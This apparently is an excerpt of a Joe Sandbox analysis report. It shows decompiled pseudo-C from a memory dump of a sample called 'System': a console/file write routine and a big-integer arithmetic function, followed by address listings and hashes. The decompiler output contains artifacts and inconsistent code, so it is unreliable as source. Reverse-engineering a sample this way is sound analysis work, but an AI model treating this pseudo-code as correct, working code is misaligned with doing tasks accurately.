				void* _t228;
				long long _t234;
				intOrPtr _t251;
				long long _t275;
				long long _t280;
				intOrPtr _t284;
				long _t293;
				void* _t296;
				char _t299;
				void* _t301;
				DWORD* _t306;
				void* _t308;
				struct _OVERLAPPED* _t311;
				void* _t312;
				void* _t314;
				signed long long _t315;
				signed char* _t317;
				void* _t325;
				intOrPtr _t326;
				long long _t333;
				void* _t335;
				signed long long _t337;
				void* _t339;
				long long _t340;
				intOrPtr _t341;
				void* _t343;
				signed long long _t344;
				long long _t346;

				_t317 = __r8;
				 *((long long*)(_t314 + 8)) = __rbx;
				_t312 = _t314 - 0x27;
				_t315 = _t314 - 0x100;
				_t215 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t312 + 0x1f) = _t215 ^ _t315;
				 *((long long*)(_t312 - 1)) = __rcx;
				r13d = r9d;
				 *((long long*)(_t312 - 0x19)) = __r8;
				_t340 = _t339 + __r8;
				 *((long long*)(_t312 - 9)) = __edx;
				 *((long long*)(_t312 - 0x49)) = _t340;
				_t344 = (__edx & 0x0000003f) + (__edx & 0x0000003f) * 8;
				_t337 = __edx >> 6;
				_t220 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff6e4c40000 + 0x6b700 + _t337 * 8)) + 0x28 + _t344 * 8));
				 *((long long*)(_t312 - 0x41)) = _t220;
				GetConsoleCP();
				 *((long long*)(_t312 - 0x59)) = _t220;
				E00007FF67FF6E4C686F4(_t220, __edx, _t315 + 0x50, 0, _t306, _t346);
				_t251 =  *((intOrPtr*)(_t315 + 0x58));
				r15d = 0;
				r10d = 0;
				 *((long long*)(_t312 - 0x51)) = _t346;
				 *((long long*)(_t312 - 0x69)) = _t346;
				_t275 =  *((intOrPtr*)(_t251 + 0xc));
				 *((long long*)(_t312 - 0x55)) = _t275;
				if (__r8 - _t340 >= 0) goto 0xe4c762d7;
				_t222 = __edx >> 6;
				 *(_t312 - 0x11) = _t222;
				r8d = 0;
				 *((char*)(_t315 + 0x40)) =  *__r8;
				 *(_t315 + 0x44) = r8d;
				_t29 =  &(_t317[1]); // 0x1
				r15d = _t29;
				if (_t275 != 0xfde9) goto 0xe4c7614b;
				_t180 = r10d;
				_t326 =  *((intOrPtr*)(0x7ff6e4c40000 + 0x6b700 + _t222 * 8));
				if ( *((intOrPtr*)(_t326 + _t344 * 8 + __r10 + 0x3e)) == r10b) goto 0xe4c75ff4;
				_t296 = __r10 + 1;
				if (_t296 - 5 < 0) goto 0xe4c75fe2;
				if (_t296 <= 0) goto 0xe4c760ec;
				r15d =  *((char*)(_t251 + 0x7ff6e4ca9490));
				r15d = r15d + 1;
				r13d = r15d;
				r13d = r13d - _t180;
				if (r13d -  *((intOrPtr*)(_t312 - 0x49)) - __r8 > 0) goto 0xe4c7629c;
				if (_t296 <= 0) goto 0xe4c7605c;
				_t333 = _t326 - _t312 + 7 + _t344 * 8;
				 *((char*)(_t312 + 7 + __r10)) =  *((intOrPtr*)(_t312 + 7 + __r10 + _t333 + 0x3e));
				if (__r10 + 1 - _t296 < 0) goto 0xe4c76043;
				r10d = 0;
				if (r13d <= 0) goto 0xe4c76076;
				E00007FF67FF6E4C64380();
				r10d = 0;
				_t280 = _t333;
				if (_t296 <= 0) goto 0xe4c7609d;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ff6e4c40000 + 0x6b700 + _t337 * 8)) + _t280 + 0x3e + _t344 * 8)) = r10b;
				if (_t280 + 1 - _t296 < 0) goto 0xe4c76085;
				 *((long long*)(_t312 - 0x39)) = 0;
				_t227 = _t312 + 7;
				 *((long long*)(_t312 - 0x31)) = _t227;
				_t157 = r10d & 0xffffff00 | r15d == 0x00000004;
				_t228 = _t227 + 1;
				r8d = _t157;
				r15d = _t157;
				E00007FF67FF6E4C81D60(_t228,  *((intOrPtr*)(_t312 - 0x65)), _t315 + 0x44, _t312 - 0x31, 0x7ff6e4c40000, _t312 - 0x39);
				if (_t228 == 0xffffffff) goto 0xe4c763b4;
				_t341 =  *((intOrPtr*)(_t312 - 0x49));
				goto 0xe4c761c0;
				_t299 =  *((char*)(( *__r8 & 0x000000ff) + 0x7ff6e4ca9490));
				if (( *( *((intOrPtr*)(0x7ff6e4c40000 + 0x6b700 + _t337 * 8)) + 0x3e + _t344 * 8) & 0x000000ff) - _t341 - __r8 > 0) goto 0xe4c76324;
				 *((long long*)(_t312 - 0x21)) = __r8;
				 *((long long*)(_t312 - 0x29)) = 0;
				r8d = r10d & 0xffffff00 | _t299 + 0x00000001 == 0x00000004;
				E00007FF67FF6E4C81D60(1, 1, _t315 + 0x44, _t312 - 0x21, _t341 - __r8, _t312 - 0x29);
				if (1 == 0xffffffff) goto 0xe4c763b4;
				r15d = _t172;
				goto 0xe4c761c0;
				_t284 =  *((intOrPtr*)(0x7ff6e4c40000 + 0x6b700 + _t337 * 8));
				_t177 =  *(_t284 + 0x3d + _t344 * 8);
				if ((_t177 & 0x00000004) == 0) goto 0xe4c76185;
				 *((char*)(_t312 + 0xf)) =  *((intOrPtr*)(_t284 + 0x3e + _t344 * 8));
				r8d = 2;
				 *(_t284 + 0x3d + _t344 * 8) = _t177 & 0x000000fb;
				 *((char*)(_t312 + 0x10)) =  *__r8;
				goto 0xe4c761ad;
				_t165 = E00007FF67FF6E4C6E4F0(0x7ff6e4c40000);
				if ( *((intOrPtr*)(0x7ff6e4c40000 + ( *__r8 & 0x000000ff) * 2)) - _t180 >= 0) goto 0xe4c761a7;
				_t301 = _t299 + __r8 + 1;
				if (_t301 - _t341 >= 0) goto 0xe4c7637a;
				r8d = 2;
				goto 0xe4c761aa;
				_t166 = E00007FF67FF6E4C77590(_t165, _t315 + 0x44, __r8);
				if (0x7ff6e4c40000 == 0xffffffff) goto 0xe4c763b4;
				_t234 = _t312 + 0x17;
				_t325 = _t315 + 0x44;
				 *((long long*)(_t315 + 0x38)) = 0;
				_t308 = _t301 + 1;
				 *((long long*)(_t315 + 0x30)) = 0;
				r9d = r15d;
				 *((long long*)(_t315 + 0x28)) = 5;
				 *((long long*)(_t315 + 0x20)) = _t234;
				E00007FF67FF6E4C7B214(_t343);
				if (_t234 == 0) goto 0xe4c763c6;
				r8d = _t166;
				 *((long long*)(_t315 + 0x20)) = 0;
				WriteFile(_t339, _t335, _t293, _t306, _t311);
				r10d = 0;
				if (_t234 == 0) goto 0xe4c763bd;
				 *((long long*)(_t312 - 0x65)) = 0;
				if ( *((intOrPtr*)(_t315 + 0x48)) - _t234 < 0) goto 0xe4c762d7;
				if ( *((char*)(_t315 + 0x40)) != 0xa) goto 0xe4c76288;
				_t122 = _t333 + 0xd; // 0xd
				 *((short*)(_t315 + 0x40)) = _t122;
				_t125 = _t333 + 1; // 0x1
				r8d = _t125;
				 *((long long*)(_t315 + 0x20)) = _t333;
				WriteFile(??, ??, ??, ??, ??);
				r10d = 0;
				if (_t234 == 0) goto 0xe4c763ab;
				if ( *((long long*)(_t315 + 0x48)) - 1 < 0) goto 0xe4c762d7;
				r15d = r15d + 1;
				 *((long long*)(_t312 - 0x65)) = 0 + 1;
				_t303 = _t308;
				if (_t308 - _t341 >= 0) goto 0xe4c762d7;
				goto 0xe4c75fab;
				if (_t325 <= 0) goto 0xe4c762d1;
				 *((char*)( *((intOrPtr*)(0x7ff6e4c40000 + 0x6b700 + _t337 * 8)) + _t303 + 0x3e + _t344 * 8)) =  *((intOrPtr*)(_t308 - _t308 + _t308));
				if (r10d - _t325 < 0) goto 0xe4c762ae;
				if ( *((intOrPtr*)(_t312 - 0x71)) == r10b) goto 0xe4c762e9;
				 *( *((intOrPtr*)(_t315 + 0x50)) + 0x3a8) =  *( *((intOrPtr*)(_t315 + 0x50)) + 0x3a8) & 0xfffffffd;
				asm("movsd xmm0, [ebp-0x69]");
				asm("movsd [eax], xmm0");
				 *((long long*)( *((intOrPtr*)(_t312 - 1)) + 8)) =  *((intOrPtr*)(_t312 - 0x51));
				return E00007FF67FF6E4C623B0( *((intOrPtr*)(_t308 - _t308 + _t308)), _t177 & 0x000000fb,  *(_t312 + 0x1f) ^ _t315);
			}











































                                                                                                                                                              0x7ff6e4c75ef4
                                                                                                                                                              0x7ff6e4c75ef4
                                                                                                                                                              0x7ff6e4c75f04
                                                                                                                                                              0x7ff6e4c75f09
                                                                                                                                                              0x7ff6e4c75f10
                                                                                                                                                              0x7ff6e4c75f1a
                                                                                                                                                              0x7ff6e4c75f27
                                                                                                                                                              0x7ff6e4c75f2e
                                                                                                                                                              0x7ff6e4c75f38
                                                                                                                                                              0x7ff6e4c75f3c
                                                                                                                                                              0x7ff6e4c75f3f
                                                                                                                                                              0x7ff6e4c75f46
                                                                                                                                                              0x7ff6e4c75f4a
                                                                                                                                                              0x7ff6e4c75f4e
                                                                                                                                                              0x7ff6e4c75f5a
                                                                                                                                                              0x7ff6e4c75f5f
                                                                                                                                                              0x7ff6e4c75f63
                                                                                                                                                              0x7ff6e4c75f70
                                                                                                                                                              0x7ff6e4c75f73
                                                                                                                                                              0x7ff6e4c75f78
                                                                                                                                                              0x7ff6e4c75f7d
                                                                                                                                                              0x7ff6e4c75f80
                                                                                                                                                              0x7ff6e4c75f83
                                                                                                                                                              0x7ff6e4c75f87
                                                                                                                                                              0x7ff6e4c75f8e
                                                                                                                                                              0x7ff6e4c75f91
                                                                                                                                                              0x7ff6e4c75f97
                                                                                                                                                              0x7ff6e4c75fa3
                                                                                                                                                              0x7ff6e4c75fa7
                                                                                                                                                              0x7ff6e4c75fad
                                                                                                                                                              0x7ff6e4c75fb0
                                                                                                                                                              0x7ff6e4c75fb4
                                                                                                                                                              0x7ff6e4c75fb9
                                                                                                                                                              0x7ff6e4c75fb9
                                                                                                                                                              0x7ff6e4c75fc3
                                                                                                                                                              0x7ff6e4c75fd0
                                                                                                                                                              0x7ff6e4c75fd3
                                                                                                                                                              0x7ff6e4c75fe7
                                                                                                                                                              0x7ff6e4c75feb
                                                                                                                                                              0x7ff6e4c75ff2
                                                                                                                                                              0x7ff6e4c75ff7
                                                                                                                                                              0x7ff6e4c76012
                                                                                                                                                              0x7ff6e4c7601b
                                                                                                                                                              0x7ff6e4c7601e
                                                                                                                                                              0x7ff6e4c76021
                                                                                                                                                              0x7ff6e4c7602a
                                                                                                                                                              0x7ff6e4c76036
                                                                                                                                                              0x7ff6e4c7603f
                                                                                                                                                              0x7ff6e4c76052
                                                                                                                                                              0x7ff6e4c76057
                                                                                                                                                              0x7ff6e4c76059
                                                                                                                                                              0x7ff6e4c7605f
                                                                                                                                                              0x7ff6e4c7606e
                                                                                                                                                              0x7ff6e4c76073
                                                                                                                                                              0x7ff6e4c76076
                                                                                                                                                              0x7ff6e4c7607c
                                                                                                                                                              0x7ff6e4c76093
                                                                                                                                                              0x7ff6e4c7609b
                                                                                                                                                              0x7ff6e4c760a3
                                                                                                                                                              0x7ff6e4c760ab
                                                                                                                                                              0x7ff6e4c760b3
                                                                                                                                                              0x7ff6e4c760bf
                                                                                                                                                              0x7ff6e4c760c2
                                                                                                                                                              0x7ff6e4c760c4
                                                                                                                                                              0x7ff6e4c760c7
                                                                                                                                                              0x7ff6e4c760ca
                                                                                                                                                              0x7ff6e4c760d3
                                                                                                                                                              0x7ff6e4c760dd
                                                                                                                                                              0x7ff6e4c760e7
                                                                                                                                                              0x7ff6e4c760f5
                                                                                                                                                              0x7ff6e4c76107
                                                                                                                                                              0x7ff6e4c7610f
                                                                                                                                                              0x7ff6e4c76113
                                                                                                                                                              0x7ff6e4c7612f
                                                                                                                                                              0x7ff6e4c76134
                                                                                                                                                              0x7ff6e4c7613d
                                                                                                                                                              0x7ff6e4c76146
                                                                                                                                                              0x7ff6e4c76149
                                                                                                                                                              0x7ff6e4c76152
                                                                                                                                                              0x7ff6e4c7615a
                                                                                                                                                              0x7ff6e4c76162
                                                                                                                                                              0x7ff6e4c7616c
                                                                                                                                                              0x7ff6e4c7616f
                                                                                                                                                              0x7ff6e4c76177
                                                                                                                                                              0x7ff6e4c76180
                                                                                                                                                              0x7ff6e4c76183
                                                                                                                                                              0x7ff6e4c76185
                                                                                                                                                              0x7ff6e4c76193
                                                                                                                                                              0x7ff6e4c76195
                                                                                                                                                              0x7ff6e4c7619b
                                                                                                                                                              0x7ff6e4c761a1
                                                                                                                                                              0x7ff6e4c761a5
                                                                                                                                                              0x7ff6e4c761b2
                                                                                                                                                              0x7ff6e4c761ba
                                                                                                                                                              0x7ff6e4c761c3
                                                                                                                                                              0x7ff6e4c761c9
                                                                                                                                                              0x7ff6e4c761ce
                                                                                                                                                              0x7ff6e4c761d3
                                                                                                                                                              0x7ff6e4c761d7
                                                                                                                                                              0x7ff6e4c761dc
                                                                                                                                                              0x7ff6e4c761df
                                                                                                                                                              0x7ff6e4c761e9
                                                                                                                                                              0x7ff6e4c761ee
                                                                                                                                                              0x7ff6e4c761f7
                                                                                                                                                              0x7ff6e4c76206
                                                                                                                                                              0x7ff6e4c76209
                                                                                                                                                              0x7ff6e4c76212
                                                                                                                                                              0x7ff6e4c76218
                                                                                                                                                              0x7ff6e4c7621d
                                                                                                                                                              0x7ff6e4c76230
                                                                                                                                                              0x7ff6e4c76237
                                                                                                                                                              0x7ff6e4c76242
                                                                                                                                                              0x7ff6e4c76248
                                                                                                                                                              0x7ff6e4c76251
                                                                                                                                                              0x7ff6e4c76256
                                                                                                                                                              0x7ff6e4c76256
                                                                                                                                                              0x7ff6e4c7625a
                                                                                                                                                              0x7ff6e4c76264
                                                                                                                                                              0x7ff6e4c7626a
                                                                                                                                                              0x7ff6e4c7626f
                                                                                                                                                              0x7ff6e4c7627a
                                                                                                                                                              0x7ff6e4c7627c
                                                                                                                                                              0x7ff6e4c76285
                                                                                                                                                              0x7ff6e4c76288
                                                                                                                                                              0x7ff6e4c7628e
                                                                                                                                                              0x7ff6e4c76297
                                                                                                                                                              0x7ff6e4c762a2
                                                                                                                                                              0x7ff6e4c762c1
                                                                                                                                                              0x7ff6e4c762cc
                                                                                                                                                              0x7ff6e4c762db
                                                                                                                                                              0x7ff6e4c762e2
                                                                                                                                                              0x7ff6e4c762ed
                                                                                                                                                              0x7ff6e4c762f6
                                                                                                                                                              0x7ff6e4c762fa
                                                                                                                                                              0x7ff6e4c76323

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite$Console
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 786612050-0
                                                                                                                                                              • Opcode ID: f6dc7d823432f32f9789ffb5f1926235ddf946f8bc542e514b73e895fa3cb5bb
                                                                                                                                                              • Instruction ID: 2e62f70706e5a08e077965d3d33fa9b7a427fff98f41df66481c998dd1a6b7af
                                                                                                                                                              • Opcode Fuzzy Hash: f6dc7d823432f32f9789ffb5f1926235ddf946f8bc542e514b73e895fa3cb5bb
                                                                                                                                                              • Instruction Fuzzy Hash: 93E1E16BB4CA829AE700CF74D5882ED77B1FB84B98B140136CB4E87B89DE39D056C305
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6E760 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 317COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00007FF67FF6E4C6E760(void* __ecx, void* __rax, signed int* __rcx, long long __rdx, signed int __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, void* _a32) {
				long long _v64;
				char _v532;
				long long _v536;
				long long _v544;
				long long _v552;
				long long _v556;
				long long _v560;
				long long _v568;
				void* __rbx;
				void* __rsi;
				void* _t111;
				void* _t114;
				signed int _t116;
				signed int _t123;
				signed int _t130;
				signed char _t134;
				void* _t139;
				signed int _t140;
				signed int _t155;
				void* _t172;
				signed long long _t180;
				intOrPtr _t195;
				signed long long _t203;
				signed long long _t205;
				signed long long _t211;
				signed int* _t218;
				signed long long _t220;
				signed long long _t238;
				signed int _t245;
				signed long long _t255;
				signed long long _t256;
				intOrPtr _t257;
				char* _t272;
				intOrPtr _t275;
				signed long long _t276;
				void* _t282;
				signed long long _t284;
				signed long long _t285;
				signed long long _t295;
				signed long long _t299;
				signed long long _t308;

				_a16 = __rdx;
				r10d =  *__rcx;
				if (r10d == 0) goto 0xe4c6eb75;
				_t257 =  *((intOrPtr*)(__rdx));
				if (_t257 == 0) goto 0xe4c6eb75;
				r10d = r10d - 1;
				_t180 = _t257 - 1;
				if (_t180 != 0) goto 0xe4c6e882;
				r12d =  *(__rdx + 4);
				if (r12d != 1) goto 0xe4c6e7d2;
				_t218 =  &(__rcx[1]);
				 *__rcx = 0;
				r9d = 0;
				_v536 = 0;
				 *((intOrPtr*)(__rcx[1] + 0x3a5e9c3)) =  *((intOrPtr*)(__rcx[1] + 0x3a5e9c3)) + __ecx;
				 *_t180 =  *_t180 + _t111;
				if (r10d != 0) goto 0xe4c6e80d;
				 *_t218 = 0;
				r9d = 0;
				_v536 = 0;
				 *(_t218[1]) =  *(_t218[1]) + sil;
				asm("ror byte [ebx-0xb08be3d], cl");
				__rcx[1] = 0x1cc;
				bpl = 0x1cc != 0;
				 *__rcx = 0;
				goto 0xe4c6eb77;
				r15d = 0xffffffff;
				if (r10d == r15d) goto 0xe4c6e846;
				_t220 = _t299;
				r10d = r10d + r15d;
				if (r10d != r15d) goto 0xe4c6e821;
				r9d = 0;
				_v536 = 0;
				_t272 =  &_v532;
				 *__rcx = 0;
				_t114 = E00007FF67FF6E4C6EB8C(_t180 | 0 << 0x00000020, _t218[1], _t220, 0x1cc, __rcx, _t272, _t282);
				__rcx[1] = r14d;
				__rcx[2] = 0 >> 0x20;
				bpl = 0 >> 0x20 != 0;
				 *__rcx = 1;
				goto 0xe4c6eb77;
				if (_t114 - r10d > 0) goto 0xe4c6eb75;
				r8d = r10d;
				_t245 = r10d;
				r8d = r8d - _t114;
				r9d = r10d;
				_t211 = r8d;
				if (_t245 - _t211 < 0) goto 0xe4c6e8e8;
				_t295 = 0 - _t211 * 4 - __rcx;
				if ( *((intOrPtr*)(_t295 + (0 >> 0x20))) != _t114) goto 0xe4c6e8d1;
				r9d = r9d - 1;
				if (_t245 - 1 - _t211 >= 0) goto 0xe4c6e8b8;
				goto 0xe4c6e8e8;
				_t116 = r9d - r8d;
				if ( *((intOrPtr*)(0 + 4 + _t116 * 4)) - __ecx >= 0) goto 0xe4c6e8eb;
				r8d = r8d + 1;
				_t155 = r8d;
				if (_t155 == 0) goto 0xe4c6eb75;
				 *((char*)(_t282 - 0x75)) =  *((char*)(_t282 - 0x75)) + 1;
				asm("insb");
				_t37 =  *((intOrPtr*)(__rcx + 4 + r9d * 4)) + 0x175b758;
				 *_t37 = _t116 + 0x8d;
				asm("bsr eax, ecx");
				_a8 = 1;
				if (_t155 == 0) goto 0xe4c6e921;
				r11d = 0x1f;
				r11d = r11d -  *_t37;
				goto 0xe4c6e924;
				r11d = _t130;
				_a24 = r11d;
				_v568 = 0x20;
				if (r11d == 0) goto 0xe4c6e96f;
				_t134 = r11d;
				r9d =  *(__rcx + 4 + __r10 * 4) % _t220;
				r9d = r9d | r9d;
				_a8 = 1;
				if (0 << 0x20 - 2 <= 0) goto 0xe4c6e96f;
				_a8 = 1 << _t134 | 0xbadbaa >> _t134;
				r14d = _t272 - 1;
				r12d = _t140;
				if (r14d < 0) goto 0xe4c6eb40;
				r15d = 0xffffffff;
				_v64 = __r13;
				r13d = 0xbadbad;
				_v544 = 0x20;
				_v552 = 0x20;
				if (r13d - r10d > 0) goto 0xe4c6e9ae;
				goto 0xe4c6e9b0;
				_a32 = 0;
				r11d = __rcx[0x64c8b4500000021];
				_v560 = __rcx[0x64c8b4500000021];
				_v556 = 0;
				if (_a24 == 0) goto 0xe4c6ea10;
				r8d = r11d;
				r11d = r11d << _t134;
				if (r13d - 3 < 0) goto 0xe4c6ea15;
				_t123 = __r13 - 3;
				r11d = r11d | _t123;
				goto 0xe4c6ea15;
				_t275 = _v560;
				_t195 = _t275;
				r8d = _t123 % 0x20;
				if (_t195 - _t308 <= 0) goto 0xe4c6ea3f;
				_t284 = _t308;
				_t276 = _t275 + (0x1 + _t195) * 0x20;
				if (_t276 - _t308 > 0) goto 0xe4c6ea6e;
				if (_a8 * _t284 - (_t276 << 0x00000020 | _t295) <= 0) goto 0xe4c6ea6e;
				_t285 = _t284 - 1;
				if (_t276 + 0x20 - _t308 <= 0) goto 0xe4c6ea51;
				if (_t285 == 0) goto 0xe4c6eb21;
				r11d = _t140;
				if (0 << 0x20 == 0) goto 0xe4c6eacf;
				_t203 =  *(_a16 + 4) * _t285;
				r8d = r10d;
				_t290 = 0 + _t203 >> 0x20;
				_t292 =  >=  ? 0 + _t203 >> 0x20 : _t290 + 1;
				r11d = r11d + 1;
				if (r11d - _t139 < 0) goto 0xe4c6ea90;
				_t205 = _a32;
				if (_t205 - ( >=  ? 0 + _t203 >> 0x20 : _t290 + 1) >= 0) goto 0xe4c6eb1d;
				r10d = _t140;
				if ((0 << 0x20) + (_t180 | 0 << 0x00000020) == 0) goto 0xe4c6eb1a;
				r10d = r10d + 1;
				_t255 =  &(__rcx[_t205]);
				 *(_t255 + 4) = r8d;
				_t172 = r10d - _t139;
				if (_t172 < 0) goto 0xe4c6eaf1;
				r10d = __r13 - 1;
				r13d = r13d - 1;
				r14d = r14d - 1;
				if (_t172 >= 0) goto 0xe4c6e9a2;
				_t238 = _t255;
				if (_t255 -  *__rcx >= 0) goto 0xe4c6eb5c;
				asm("o16 nop [eax+eax]");
				 *((long long*)(__rcx + 4 + _t238 * 4)) = 0;
				if (_t238 + 1 -  *__rcx < 0) goto 0xe4c6eb50;
				 *__rcx = _t255;
				if (_t255 == 0) goto 0xe4c6eb70;
				_t256 = _t255 - 1;
				if ( *((intOrPtr*)(__rcx + 4 + _t256 * 4)) != 0) goto 0xe4c6eb70;
				 *__rcx = _t256;
				if (_t256 != 0) goto 0xe4c6eb62;
				goto 0xe4c6eb77;
				return r9d;
			}












































                                                                                                                                                              0x7ff6e4c6e760
                                                                                                                                                              0x7ff6e4c6e776
                                                                                                                                                              0x7ff6e4c6e782
                                                                                                                                                              0x7ff6e4c6e788
                                                                                                                                                              0x7ff6e4c6e78c
                                                                                                                                                              0x7ff6e4c6e792
                                                                                                                                                              0x7ff6e4c6e795
                                                                                                                                                              0x7ff6e4c6e79a
                                                                                                                                                              0x7ff6e4c6e7a0
                                                                                                                                                              0x7ff6e4c6e7aa
                                                                                                                                                              0x7ff6e4c6e7b4
                                                                                                                                                              0x7ff6e4c6e7b8
                                                                                                                                                              0x7ff6e4c6e7ba
                                                                                                                                                              0x7ff6e4c6e7bd
                                                                                                                                                              0x7ff6e4c6e7ca
                                                                                                                                                              0x7ff6e4c6e7d0
                                                                                                                                                              0x7ff6e4c6e7d5
                                                                                                                                                              0x7ff6e4c6e7df
                                                                                                                                                              0x7ff6e4c6e7e1
                                                                                                                                                              0x7ff6e4c6e7e8
                                                                                                                                                              0x7ff6e4c6e7f5
                                                                                                                                                              0x7ff6e4c6e7f7
                                                                                                                                                              0x7ff6e4c6e7ff
                                                                                                                                                              0x7ff6e4c6e802
                                                                                                                                                              0x7ff6e4c6e806
                                                                                                                                                              0x7ff6e4c6e808
                                                                                                                                                              0x7ff6e4c6e80d
                                                                                                                                                              0x7ff6e4c6e81c
                                                                                                                                                              0x7ff6e4c6e81e
                                                                                                                                                              0x7ff6e4c6e82c
                                                                                                                                                              0x7ff6e4c6e844
                                                                                                                                                              0x7ff6e4c6e846
                                                                                                                                                              0x7ff6e4c6e849
                                                                                                                                                              0x7ff6e4c6e84d
                                                                                                                                                              0x7ff6e4c6e852
                                                                                                                                                              0x7ff6e4c6e85d
                                                                                                                                                              0x7ff6e4c6e865
                                                                                                                                                              0x7ff6e4c6e872
                                                                                                                                                              0x7ff6e4c6e875
                                                                                                                                                              0x7ff6e4c6e87b
                                                                                                                                                              0x7ff6e4c6e87d
                                                                                                                                                              0x7ff6e4c6e885
                                                                                                                                                              0x7ff6e4c6e88b
                                                                                                                                                              0x7ff6e4c6e88e
                                                                                                                                                              0x7ff6e4c6e891
                                                                                                                                                              0x7ff6e4c6e894
                                                                                                                                                              0x7ff6e4c6e897
                                                                                                                                                              0x7ff6e4c6e89d
                                                                                                                                                              0x7ff6e4c6e8b1
                                                                                                                                                              0x7ff6e4c6e8be
                                                                                                                                                              0x7ff6e4c6e8c0
                                                                                                                                                              0x7ff6e4c6e8cd
                                                                                                                                                              0x7ff6e4c6e8cf
                                                                                                                                                              0x7ff6e4c6e8d4
                                                                                                                                                              0x7ff6e4c6e8e6
                                                                                                                                                              0x7ff6e4c6e8e8
                                                                                                                                                              0x7ff6e4c6e8eb
                                                                                                                                                              0x7ff6e4c6e8ee
                                                                                                                                                              0x7ff6e4c6e902
                                                                                                                                                              0x7ff6e4c6e906
                                                                                                                                                              0x7ff6e4c6e907
                                                                                                                                                              0x7ff6e4c6e907
                                                                                                                                                              0x7ff6e4c6e90a
                                                                                                                                                              0x7ff6e4c6e90d
                                                                                                                                                              0x7ff6e4c6e914
                                                                                                                                                              0x7ff6e4c6e916
                                                                                                                                                              0x7ff6e4c6e91c
                                                                                                                                                              0x7ff6e4c6e91f
                                                                                                                                                              0x7ff6e4c6e921
                                                                                                                                                              0x7ff6e4c6e927
                                                                                                                                                              0x7ff6e4c6e92f
                                                                                                                                                              0x7ff6e4c6e936
                                                                                                                                                              0x7ff6e4c6e941
                                                                                                                                                              0x7ff6e4c6e946
                                                                                                                                                              0x7ff6e4c6e94b
                                                                                                                                                              0x7ff6e4c6e94e
                                                                                                                                                              0x7ff6e4c6e958
                                                                                                                                                              0x7ff6e4c6e968
                                                                                                                                                              0x7ff6e4c6e971
                                                                                                                                                              0x7ff6e4c6e975
                                                                                                                                                              0x7ff6e4c6e97b
                                                                                                                                                              0x7ff6e4c6e983
                                                                                                                                                              0x7ff6e4c6e98c
                                                                                                                                                              0x7ff6e4c6e994
                                                                                                                                                              0x7ff6e4c6e998
                                                                                                                                                              0x7ff6e4c6e99d
                                                                                                                                                              0x7ff6e4c6e9a5
                                                                                                                                                              0x7ff6e4c6e9ac
                                                                                                                                                              0x7ff6e4c6e9b4
                                                                                                                                                              0x7ff6e4c6e9c3
                                                                                                                                                              0x7ff6e4c6e9c8
                                                                                                                                                              0x7ff6e4c6e9cd
                                                                                                                                                              0x7ff6e4c6e9da
                                                                                                                                                              0x7ff6e4c6e9e1
                                                                                                                                                              0x7ff6e4c6e9f4
                                                                                                                                                              0x7ff6e4c6e9fb
                                                                                                                                                              0x7ff6e4c6ea01
                                                                                                                                                              0x7ff6e4c6ea0b
                                                                                                                                                              0x7ff6e4c6ea0e
                                                                                                                                                              0x7ff6e4c6ea10
                                                                                                                                                              0x7ff6e4c6ea17
                                                                                                                                                              0x7ff6e4c6ea1d
                                                                                                                                                              0x7ff6e4c6ea26
                                                                                                                                                              0x7ff6e4c6ea35
                                                                                                                                                              0x7ff6e4c6ea3c
                                                                                                                                                              0x7ff6e4c6ea42
                                                                                                                                                              0x7ff6e4c6ea5e
                                                                                                                                                              0x7ff6e4c6ea60
                                                                                                                                                              0x7ff6e4c6ea6c
                                                                                                                                                              0x7ff6e4c6ea71
                                                                                                                                                              0x7ff6e4c6ea7a
                                                                                                                                                              0x7ff6e4c6ea7f
                                                                                                                                                              0x7ff6e4c6ea96
                                                                                                                                                              0x7ff6e4c6eaa1
                                                                                                                                                              0x7ff6e4c6eaa6
                                                                                                                                                              0x7ff6e4c6eab7
                                                                                                                                                              0x7ff6e4c6eabe
                                                                                                                                                              0x7ff6e4c6eac8
                                                                                                                                                              0x7ff6e4c6eacf
                                                                                                                                                              0x7ff6e4c6ead9
                                                                                                                                                              0x7ff6e4c6eadb
                                                                                                                                                              0x7ff6e4c6eae0
                                                                                                                                                              0x7ff6e4c6eaf5
                                                                                                                                                              0x7ff6e4c6eafc
                                                                                                                                                              0x7ff6e4c6eb0d
                                                                                                                                                              0x7ff6e4c6eb15
                                                                                                                                                              0x7ff6e4c6eb18
                                                                                                                                                              0x7ff6e4c6eb1d
                                                                                                                                                              0x7ff6e4c6eb25
                                                                                                                                                              0x7ff6e4c6eb2e
                                                                                                                                                              0x7ff6e4c6eb32
                                                                                                                                                              0x7ff6e4c6eb44
                                                                                                                                                              0x7ff6e4c6eb48
                                                                                                                                                              0x7ff6e4c6eb4a
                                                                                                                                                              0x7ff6e4c6eb54
                                                                                                                                                              0x7ff6e4c6eb5a
                                                                                                                                                              0x7ff6e4c6eb5c
                                                                                                                                                              0x7ff6e4c6eb60
                                                                                                                                                              0x7ff6e4c6eb62
                                                                                                                                                              0x7ff6e4c6eb68
                                                                                                                                                              0x7ff6e4c6eb6a
                                                                                                                                                              0x7ff6e4c6eb6e
                                                                                                                                                              0x7ff6e4c6eb73
                                                                                                                                                              0x7ff6e4c6eb88

                                                                                                                                                              APIs
